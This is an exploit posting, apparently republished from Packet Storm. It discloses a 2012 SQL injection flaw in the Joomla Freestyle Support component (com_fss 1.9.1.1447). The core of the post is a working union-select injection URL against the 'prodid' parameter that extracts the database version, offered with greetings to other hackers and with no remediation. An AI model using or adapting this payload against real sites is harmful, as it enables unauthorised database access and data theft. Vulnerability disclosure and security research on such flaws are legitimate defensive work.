Joomla Freestyle Support component version 1.9.1.1447 suffers from a remote SQL injection vulnerability.
f435492e3f19abf07fe1c8d0509f446005f9930040bdd4c5203fed8c6a03ce2b Exploit Title: Joomla Freestyle Support com_fss sqli
Dork: N/A
Date: [17-10-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://freestyle-joomla.com
Version: Version 1.9.1.1447 (last update on Oct 15, 2012)
License: Commercial
Demo: http://freestyle-joomla.com/demo
Download: http://freestyle-joomla.com/fssdownloads
Tested on: [Linux(bt5)-Windows(7ultimate)]
Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt
Descripcion joomla component:
Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use.
Warning: Invalid argument supplied for foreach() in
Exploit:
SQL : SQL injection
http://127.0.0.1/index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
_____________________________________________________
Daniel Barragan "D4NB4R" 2012
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed